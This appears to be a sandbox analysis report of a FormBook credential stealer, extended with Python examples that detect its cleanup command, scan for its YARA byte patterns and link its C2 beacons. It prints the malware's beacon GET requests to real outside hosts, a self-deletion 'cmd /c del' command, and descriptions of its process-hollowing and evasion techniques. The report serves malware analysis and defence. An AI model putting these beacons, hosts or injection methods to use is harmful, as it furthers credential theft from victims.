
Analysis Report vOKMFxiCYt.exe

Overview

General Information

Sample Name: vOKMFxiCYt.exe
Analysis ID: 321296
MD5: bb30a5dd4130b071fb4ca5f005371c63
SHA1: 52c3ca02828a4ad8e8dbf790a61b3d77379ad391
SHA256: 4c73fd4286e76a094eefafe5369f3a184ca4a38d567ae6dfad61645bf968a83f
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • vOKMFxiCYt.exe (PID: 2764 cmdline: 'C:\Users\user\Desktop\vOKMFxiCYt.exe' MD5: BB30A5DD4130B071FB4CA5F005371C63)
    • RegSvcs.exe (PID: 5984 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • raserver.exe (PID: 5028 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 2AADF65E395BFBD0D9B71D7279C8B5EC)
          • cmd.exe (PID: 6040 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
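
Reading the tree together with the Yara hits per process index: process 0 (the .NET loader) holds a copy of the payload in memory, process 1 (RegSvcs.exe, hollowed) and process 4 (raserver.exe) execute it, and explorer.exe appears as a child of RegSvcs.exe only because the sandbox draws injected processes under their injector. The last step, cmd.exe /c del of RegSvcs.exe, removes the file of the hollowed host rather than a dropped file: the target is a Microsoft .NET Framework binary, so the attempt is noisy and, for a non-elevated process, normally fails on the directory's ACLs. The Python below is an added example, not part of the Joe Sandbox report: it runs a detection for that deletion step over a process-creation event list constructed from the PIDs, images and command lines in the tree. The image paths of explorer.exe and cmd.exe (the report prints only their names) and the Sysmon-like field layout are assumptions. It deliberately does not use ancestry, because on a real host the recorded parent of explorer.exe is userinit.exe, not the injecting process.

```python
"""Flag `cmd /c del <path>` events that remove a Windows binary or the image
of another process in the same event stream.

Added example, not part of the Joe Sandbox report.  The events are
constructed from the report's process tree; the image paths of explorer.exe
and cmd.exe and the field layout are assumptions.
"""
import ntpath
import re
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: Optional[int]
    image: str
    cmdline: str


@dataclass(frozen=True)
class Finding:
    pid: int
    rule: str
    target: str


# Constructed from the Startup tree (PIDs and command lines as reported).
# explorer.exe and cmd.exe paths are assumed; the report prints only the names.
EVENTS = [
    ProcEvent(2764, None, r"C:\Users\user\Desktop\vOKMFxiCYt.exe",
              r"'C:\Users\user\Desktop\vOKMFxiCYt.exe'"),
    ProcEvent(5984, 2764, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
              r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"),
    ProcEvent(3388, 5984, r"C:\Windows\explorer.exe", ""),
    ProcEvent(5028, 3388, r"C:\Windows\SysWOW64\raserver.exe",
              r"C:\Windows\SysWOW64\raserver.exe"),
    ProcEvent(6040, 5028, r"C:\Windows\SysWOW64\cmd.exe",
              r"/c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'"),
    ProcEvent(4104, 6040, r"C:\Windows\system32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

# `del [/f /q ...] <path>`; the sandbox prints double quotes as single quotes,
# so both quote styles are accepted around the target.
DEL_RE = re.compile(r"""\bdel\b\s+(?:/[a-z]\s+)*["']?([^"']+?)["']?\s*$""", re.IGNORECASE)
WINDIR = ntpath.normcase(r"C:\Windows") + "\\"


def norm(path: str) -> str:
    """Lower-case, backslash-normalised path for comparisons (works off-Windows too)."""
    return ntpath.normcase(path)


def del_target(cmdline: str) -> Optional[str]:
    """Path named by a `del` command, or None if the command line is not a del."""
    m = DEL_RE.search(cmdline)
    return m.group(1) if m else None


def detect(events) -> list:
    """Return findings for cmd.exe del targets under C:\\Windows or matching
    the image of another process in the stream (the injection host here)."""
    images = {norm(e.image): e.pid for e in events}
    findings = []
    for e in events:
        if ntpath.basename(norm(e.image)) != "cmd.exe":
            continue
        target = del_target(e.cmdline)
        if not target:
            continue
        t = norm(target)
        if t.startswith(WINDIR):
            findings.append(Finding(e.pid, "del_under_windows_dir", target))
        if t in images and images[t] != e.pid:
            findings.append(Finding(e.pid, f"del_image_of_pid_{images[t]}", target))
    return findings


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f"PID {f.pid}: {f.rule} -> {f.target}")
```

On the constructed events this yields two findings for PID 6040: the target lies under C:\Windows, and it is the image of PID 5984. A del of a temp file under the user's profile produces nothing, which keeps ordinary installer clean-up out of the result.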

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000001.00000002.272036979.00000000015B0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.272036979.00000000015B0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.272036979.00000000015B0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18409:$sqlite3step: 68 34 1C 7B E1
  • 0x1851c:$sqlite3step: 68 34 1C 7B E1
  • 0x18438:$sqlite3text: 68 38 2A 90 C5
  • 0x1855d:$sqlite3text: 68 38 2A 90 C5
  • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.241947943.0000000002B43000.00000004.00000001.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
00000000.00000002.241858795.0000000002AC1000.00000004.00000001.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
[table truncated in this export; the full report lists 19 entries]

Unpacked PEs

Source | Rule | Description | Author
1.2.RegSvcs.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.RegSvcs.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.RegSvcs.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18409:$sqlite3step: 68 34 1C 7B E1
  • 0x1851c:$sqlite3step: 68 34 1C 7B E1
  • 0x18438:$sqlite3text: 68 38 2A 90 C5
  • 0x1855d:$sqlite3text: 68 38 2A 90 C5
  • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
1.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.RegSvcs.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
[table truncated in this export; 1 entry not shown]
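
The Yara hits in both tables above are raw byte patterns, and it helps to know what they encode. Each JPCERT $sqlite3* pattern is an x86 `push imm32` (opcode 68) followed by a 32-bit constant; the rule's string names indicate that these constants stand for the sqlite3_step, sqlite3_column_text and sqlite3_column_blob routines FormBook needs to read browser credential databases. $sequence_0 from the yara-signator rule disassembles to `add ecx, eax / rdtsc / sub eax, ecx / mov [ebp-4], eax`, the cycle-count delta behind the report's "Tries to detect virtualization through RDTSC time measurements" signature. The Python below is an added example, not part of the Joe Sandbox report and not the published rules themselves: it scans a buffer for those four patterns, decodes the pushed immediates, and applies an "all three sqlite3 constants present" condition, which is this example's assumption about how the JPCERT rule combines its strings. The scanned buffer is constructed here, with the patterns planted at chosen offsets.

```python
"""Minimal scanner for the Formbook byte patterns reported above.

Added example: this is not the Joe Sandbox report's code nor the published
YARA rules.  The byte patterns are copied from the rule hits in the report;
the 'all three sqlite3 constants present' condition is this example's
assumption about the JPCERT rule, not a quote of it.
"""
import struct
from dataclasses import dataclass
from typing import Optional

# 68 xx xx xx xx = x86 `push imm32`; the immediates are the constants the
# JPCERT rule keys on (names taken from the report's string identifiers).
PUSH_PATTERNS = {
    "$sqlite3step": bytes.fromhex("68 34 1C 7B E1"),
    "$sqlite3text": bytes.fromhex("68 38 2A 90 C5"),
    "$sqlite3blob": bytes.fromhex("68 53 D8 7F 8C"),
}
# $sequence_0 from the yara-signator rule:
#   03 C8      add ecx, eax
#   0F 31      rdtsc
#   2B C1      sub eax, ecx
#   89 45 FC   mov [ebp-4], eax   -> elapsed-cycle delta used for VM/debugger timing
RDTSC_DELTA = bytes.fromhex("03 C8 0F 31 2B C1 89 45 FC")


@dataclass(frozen=True)
class Hit:
    name: str
    offset: int
    imm32: Optional[int]  # decoded push immediate, None for $sequence_0


def find_all(buf: bytes, needle: bytes):
    """Yield every (possibly overlapping) offset of needle in buf."""
    start = 0
    while (pos := buf.find(needle, start)) != -1:
        yield pos
        start = pos + 1


def scan(buf: bytes) -> list:
    """Return all pattern hits in buf, in the style of the report's offset list."""
    hits = []
    for name, pattern in PUSH_PATTERNS.items():
        for off in find_all(buf, pattern):
            # little-endian imm32 sits right after the 68 opcode byte
            imm = struct.unpack_from("<I", buf, off + 1)[0]
            hits.append(Hit(name, off, imm))
    for off in find_all(buf, RDTSC_DELTA):
        hits.append(Hit("$sequence_0", off, None))
    return hits


def formbook_condition(hits) -> bool:
    """Assumed condition: all three sqlite3 constants must be present."""
    present = {h.name for h in hits}
    return {"$sqlite3step", "$sqlite3text", "$sqlite3blob"} <= present


def build_sample() -> bytes:
    """Constructed buffer (not a real dump): NOP filler with the patterns
    planted at fixed offsets so the scanner's output can be checked."""
    buf = bytearray(b"\x90" * 0x400)
    buf[0x100:0x105] = PUSH_PATTERNS["$sqlite3step"]
    buf[0x120:0x125] = PUSH_PATTERNS["$sqlite3text"]
    buf[0x140:0x145] = PUSH_PATTERNS["$sqlite3blob"]
    buf[0x200:0x209] = RDTSC_DELTA
    return bytes(buf)


if __name__ == "__main__":
    sample_hits = scan(build_sample())
    for h in sorted(sample_hits, key=lambda h: h.offset):
        imm = f"  imm32=0x{h.imm32:08X}" if h.imm32 is not None else ""
        print(f"0x{h.offset:x}:{h.name}{imm}")
    print("Formbook condition:", formbook_condition(sample_hits))
```

Running it against a real dump (read the .sdmp file as bytes and pass it to scan) reproduces the offset:name listing the report prints; the decoded immediates (0xE17B1C34, 0xC5902A38, 0x8C7FD853) are the values to look for when the push sequences are rewritten by a different compiler or packer and the exact 5-byte pattern no longer matches.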

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: vOKMFxiCYt.exe | ReversingLabs: Detection: 35%
Yara detected FormBook
Source: Yara match; file sources:
  • 00000001.00000002.272036979.00000000015B0000.00000040.00000001.sdmp, type: MEMORY
  • 00000001.00000002.271729564.0000000000400000.00000040.00000001.sdmp, type: MEMORY
  • 00000000.00000002.242174585.0000000003AC9000.00000004.00000001.sdmp, type: MEMORY
  • 00000004.00000002.504019492.0000000001140000.00000040.00000001.sdmp, type: MEMORY
  • 00000001.00000002.272011723.0000000001580000.00000040.00000001.sdmp, type: MEMORY
  • 00000004.00000002.503167127.0000000000E00000.00000040.00000001.sdmp, type: MEMORY
  • 00000004.00000002.505106609.0000000004AF0000.00000004.00000001.sdmp, type: MEMORY
  • 1.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
  • 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: vOKMFxiCYt.exe | Joe Sandbox ML: detected
Source: 1.2.RegSvcs.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.3:49737
Source: global traffic | HTTP traffic detected:
  GET /glt/?SP=cnxhAdAh&V4=RXCBf+kTtqMKofvvq54zDDgrcqehmcxCBUCamp/3E7fzZOB7U/XBgSeZZ5TRQ//94zw4 HTTP/1.1
  Host: www.tessuto.net
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected:
  GET /glt/?V4=MLpAZ0AK/spUlt1gTLvrDwTqfxMoBLVQzrzuTOkSqlsdFHJLAwBY2ZzU1xSBGMRzyeG8&SP=cnxhAdAh HTTP/1.1
  Host: www.reem.pro
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected:
  GET /glt/?SP=cnxhAdAh&V4=oeIisVoovR5GVMPXvvkWG2hSa0zFuUbByopAkVC9hBB+Ndji49czoVDBLaeM7MDZ9TnP HTTP/1.1
  Host: www.themaskedstitcher.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected:
  GET /glt/?V4=hWCSv9Zrwql4NKRqpOYz8tuCeFQ4j+1tRbbWxD4HfruMRkMSYBHm3MJuhB2jB30ChDel&SP=cnxhAdAh HTTP/1.1
  Host: www.auctionpros.club
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
Source: Joe Sandbox View | IP Address: 198.49.23.141
Source: Joe Sandbox View | IP Address: 34.102.136.180
Source: Joe Sandbox View | ASN Name: NAMECHEAP-NETUS
Source: Joe Sandbox View | ASN Name: GOOGLEUS
Source: unknown | DNS traffic detected: queries for: www.tessuto.net
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Fri, 20 Nov 2020 19:05:26 GMT
  Content-Type: text/html
  Content-Length: 153
  Connection: close
  Server: nginx/1.16.1
  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
Source: raserver.exe, 00000004.00000002.506812727.000000000574F000.00000004.00000001.sdmp | String found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=
Source: explorer.exe, 00000002.00000000.257287184.0000000008907000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: vOKMFxiCYt.exe, 00000000.00000002.241858795.0000000002AC1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmp | Strings found in binary or memory:
  • http://fontfabrik.com
  • http://www.apache.org/licenses/LICENSE-2.0
  • http://www.carterandcone.coml
  • http://www.fontbureau.com
  • http://www.fontbureau.com/designers
  • http://www.fontbureau.com/designers/?
  • http://www.fontbureau.com/designers/cabarga.htmlN
  • http://www.fontbureau.com/designers/frere-jones.html
  • http://www.fontbureau.com/designers8
  • http://www.fontbureau.com/designers?
  • http://www.fontbureau.com/designersG
  • http://www.fonts.com
  • http://www.founder.com.cn/cn
  • http://www.founder.com.cn/cn/bThe
  • http://www.founder.com.cn/cn/cThe
  • http://www.galapagosdesign.com/DPlease
  • http://www.galapagosdesign.com/staff/dennis.htm
  • http://www.goodfont.co.kr
  • http://www.jiyu-kobo.co.jp/
  • http://www.sajatypeworks.com
  • http://www.sakkal.com
  • http://www.sandoll.co.kr
  • http://www.tiro.com
  • http://www.typography.netD
  • http://www.urwpp.deDPlease
  • http://www.zhongyicts.com.cn
Source: vOKMFxiCYt.exe, 00000000.00000002.241448279.0000000000D2A000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Note on these strings: the explorer.exe entries are type-foundry and licence URLs carried in the metadata of system fonts explorer.exe has mapped, and the schemas.xmlsoap.org claims URI is a .NET Framework identity constant in the loader; none of them is an indicator tied to this sample. The cpanel.com link in raserver.exe memory is the footer link of a standard cPanel placeholder page, consistent with one of the contacted hosts answering with a parking page rather than a live panel. The indicators worth acting on are the four /glt/ hosts and the two IPs listed under HTTP traffic above.
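
The four GET requests share one shape: a single short path segment (/glt/), exactly two query parameters whose order flips between requests, Host and Connection: close headers, and no User-Agent (the "HTTP GET or POST without a user agent" signature). One parameter, SP=cnxhAdAh, keeps the same value on all four hosts while V4 changes every time, so the constant parameter is the value to pivot on when hunting for the other domains this build rotates through. The Python below is an added example, not part of the Joe Sandbox report: it parses the requests, reconstructed here as raw HTTP from the report's lines, applies that shape as a heuristic, and returns the parameter values shared across hosts. The path regex and the two-parameter rule are this example's assumptions about the beacon format, not a FormBook specification.

```python
"""Link Formbook-style beacons across hosts by their constant query parameter.

Added example, not part of the Joe Sandbox report.  The raw requests below
are reconstructed from the report's four GET lines; only the Host and
Connection headers are reproduced because the report shows no others.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

RAW_REQUESTS = [
    b"GET /glt/?SP=cnxhAdAh&V4=RXCBf+kTtqMKofvvq54zDDgrcqehmcxCBUCamp/3E7fzZOB7U/XBgSeZZ5TRQ//94zw4 HTTP/1.1\r\n"
    b"Host: www.tessuto.net\r\nConnection: close\r\n\r\n",
    b"GET /glt/?V4=MLpAZ0AK/spUlt1gTLvrDwTqfxMoBLVQzrzuTOkSqlsdFHJLAwBY2ZzU1xSBGMRzyeG8&SP=cnxhAdAh HTTP/1.1\r\n"
    b"Host: www.reem.pro\r\nConnection: close\r\n\r\n",
    b"GET /glt/?SP=cnxhAdAh&V4=oeIisVoovR5GVMPXvvkWG2hSa0zFuUbByopAkVC9hBB+Ndji49czoVDBLaeM7MDZ9TnP HTTP/1.1\r\n"
    b"Host: www.themaskedstitcher.com\r\nConnection: close\r\n\r\n",
    b"GET /glt/?V4=hWCSv9Zrwql4NKRqpOYz8tuCeFQ4j+1tRbbWxD4HfruMRkMSYBHm3MJuhB2jB30ChDel&SP=cnxhAdAh HTTP/1.1\r\n"
    b"Host: www.auctionpros.club\r\nConnection: close\r\n\r\n",
]

# Assumption: one short alphanumeric path segment such as /glt/.
SHORT_PATH = re.compile(r"^/[A-Za-z0-9]{2,6}/$")


def parse_request(raw: bytes) -> dict:
    """Split a raw HTTP/1.1 request into method, host, path, query params, headers."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    # Split the query by hand: parse_qsl would turn '+' into a space and
    # percent-decode, and these values are base64-like with '+' and '/' in them.
    params = [tuple(p.split("=", 1)) if "=" in p else (p, "")
              for p in url.query.split("&") if p]
    return {"method": method, "host": headers.get("host", ""), "path": url.path,
            "params": params, "headers": headers}


def looks_like_formbook_beacon(req: dict) -> bool:
    """Heuristic shape of the beacons in the report (assumption, not a spec)."""
    return (req["method"] == "GET"
            and SHORT_PATH.match(req["path"]) is not None
            and len(req["params"]) == 2
            and "user-agent" not in req["headers"]
            and req["headers"].get("connection", "").lower() == "close")


def shared_params(reqs) -> dict:
    """{(name, value): [hosts...]} for parameter values seen on more than one host."""
    hosts_by_param = defaultdict(set)
    for r in reqs:
        for name, value in r["params"]:
            hosts_by_param[(name, value)].add(r["host"])
    return {k: sorted(v) for k, v in hosts_by_param.items() if len(v) > 1}


def analyse(raw_requests) -> dict:
    """Parse, filter to beacon-shaped requests, and return the cross-host pivots."""
    reqs = [parse_request(r) for r in raw_requests]
    beacons = [r for r in reqs if looks_like_formbook_beacon(r)]
    return {"beacons": beacons, "pivots": shared_params(beacons)}


if __name__ == "__main__":
    result = analyse(RAW_REQUESTS)
    print(f"{len(result['beacons'])} beacon-shaped requests")
    for (name, value), hosts in result["pivots"].items():
        print(f"{name}={value} seen on: {', '.join(hosts)}")
```

On the four reconstructed requests the only cross-host pivot is SP=cnxhAdAh, shared by all four domains, while each V4 value is unique to its request. Feeding the same function the HTTP request log of a proxy lets the constant value surface the remaining domains of the rotation even when the path segment differs.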

E-Banking Fraud:

Yara detected FormBook
Source: Yara match; the file sources are the same as listed under AV Detection above (the seven memory dumps and the two unpacked RegSvcs.exe images)

System Summary:

Malicious sample detected (through community Yara rule)
Each of the sources below matched both community rules: "autogenerated rule brought to you by yara-signator" (Author: Felix Bilstein - yara-signator at cocacoding dot com) and "detect Formbook in memory" (Author: JPCERT/CC Incident Response Group).
  • 00000001.00000002.272036979.00000000015B0000.00000040.00000001.sdmp, type: MEMORY
  • 00000001.00000002.271729564.0000000000400000.00000040.00000001.sdmp, type: MEMORY
  • 00000000.00000002.242174585.0000000003AC9000.00000004.00000001.sdmp, type: MEMORY
  • 00000004.00000002.504019492.0000000001140000.00000040.00000001.sdmp, type: MEMORY
  • 00000001.00000002.272011723.0000000001580000.00000040.00000001.sdmp, type: MEMORY
  • 00000004.00000002.503167127.0000000000E00000.00000040.00000001.sdmp, type: MEMORY
  • 00000004.00000002.505106609.0000000004AF0000.00000004.00000001.sdmp, type: MEMORY
  • 1.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
  • 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code functions calling native APIs (process 1):
  1_2_00419D60 NtCreateFile
  1_2_00419E10 NtReadFile
  1_2_00419E90 NtClose
  1_2_00419F40 NtAllocateVirtualMemory
  1_2_00419E8A NtClose
  1_2_01699910 NtAdjustPrivilegesToken, LdrInitializeThunk
  1_2_016999A0 NtCreateSection, LdrInitializeThunk
  1_2_01699860 NtQuerySystemInformation, LdrInitializeThunk
  1_2_01699840 NtDelayExecution, LdrInitializeThunk
  1_2_016998F0 NtReadVirtualMemory, LdrInitializeThunk
  1_2_01699A50 NtCreateFile, LdrInitializeThunk
  1_2_01699A20 NtResumeThread, LdrInitializeThunk
  1_2_01699A00 NtProtectVirtualMemory, LdrInitializeThunk
  1_2_01699540 NtReadFile, LdrInitializeThunk
  1_2_016995D0 NtClose, LdrInitializeThunk
  1_2_01699710 NtQueryInformationToken, LdrInitializeThunk
  1_2_016997A0 NtUnmapViewOfSection, LdrInitializeThunk
  1_2_01699780 NtMapViewOfSection, LdrInitializeThunk
  1_2_01699660 NtAllocateVirtualMemory, LdrInitializeThunk
  1_2_016996E0 NtFreeVirtualMemory, LdrInitializeThunk
  1_2_01699950 NtQueueApcThread
  1_2_016999D0 NtCreateProcessEx
  1_2_0169B040 NtSuspendThread
  1_2_01699820 NtEnumerateKey
  1_2_016998A0 NtWriteVirtualMemory
  1_2_01699B00 NtSetValueKey
  1_2_0169A3B0 NtGetContextThread
  1_2_01699A10 NtQuerySection
  1_2_01699A80 NtOpenDirectoryObject
  1_2_01699560 NtWriteFile
  1_2_01699520 NtWaitForSingleObject
  1_2_0169AD30 NtSetContextThread
  1_2_016995F0 NtQueryInformationFile
  1_2_01699760 NtOpenProcess
  1_2_01699770 NtSetInformationFile
  1_2_0169A770 NtOpenThread
  1_2_01699730 NtQueryVirtualMemory
  1_2_0169A710 NtOpenProcessToken
  1_2_01699FE0 NtCreateMutant
  1_2_01699670 NtQueryInformationProcess
  1_2_01699650 NtQueryValueKey
  1_2_01699610 NtEnumerateValueKey
  1_2_016996D0 NtCreateKey
Source: C:\Windows\SysWOW64\raserver.exe | Code functions calling native APIs (process 4):
  4_2_04D99840 NtDelayExecution, LdrInitializeThunk
  4_2_04D99860 NtQuerySystemInformation, LdrInitializeThunk
  4_2_04D995D0 NtClose, LdrInitializeThunk
  4_2_04D999A0 NtCreateSection, LdrInitializeThunk
  4_2_04D99540 NtReadFile, LdrInitializeThunk
  4_2_04D99910 NtAdjustPrivilegesToken, LdrInitializeThunk
  4_2_04D996D0 NtCreateKey, LdrInitializeThunk
  4_2_04D996E0 NtFreeVirtualMemory, LdrInitializeThunk
  4_2_04D99A50 NtCreateFile, LdrInitializeThunk
  4_2_04D99650 NtQueryValueKey, LdrInitializeThunk
  4_2_04D99660 NtAllocateVirtualMemory, LdrInitializeThunk
  4_2_04D99FE0 NtCreateMutant, LdrInitializeThunk
  4_2_04D99780 NtMapViewOfSection, LdrInitializeThunk
  4_2_04D99710 NtQueryInformationToken, LdrInitializeThunk
  4_2_04D998F0 NtReadVirtualMemory
  4_2_04D998A0 NtWriteVirtualMemory
  4_2_04D9B040 NtSuspendThread
  4_2_04D99820 NtEnumerateKey
  4_2_04D999D0 NtCreateProcessEx
  4_2_04D995F0 NtQueryInformationFile
  4_2_04D99950 NtQueueApcThread
  4_2_04D99560 NtWriteFile
  4_2_04D9AD30 NtSetContextThread
  4_2_04D99520 NtWaitForSingleObject
  4_2_04D99A80 NtOpenDirectoryObject
  4_2_04D99670 NtQueryInformationProcess
  4_2_04D99610 NtEnumerateValueKey
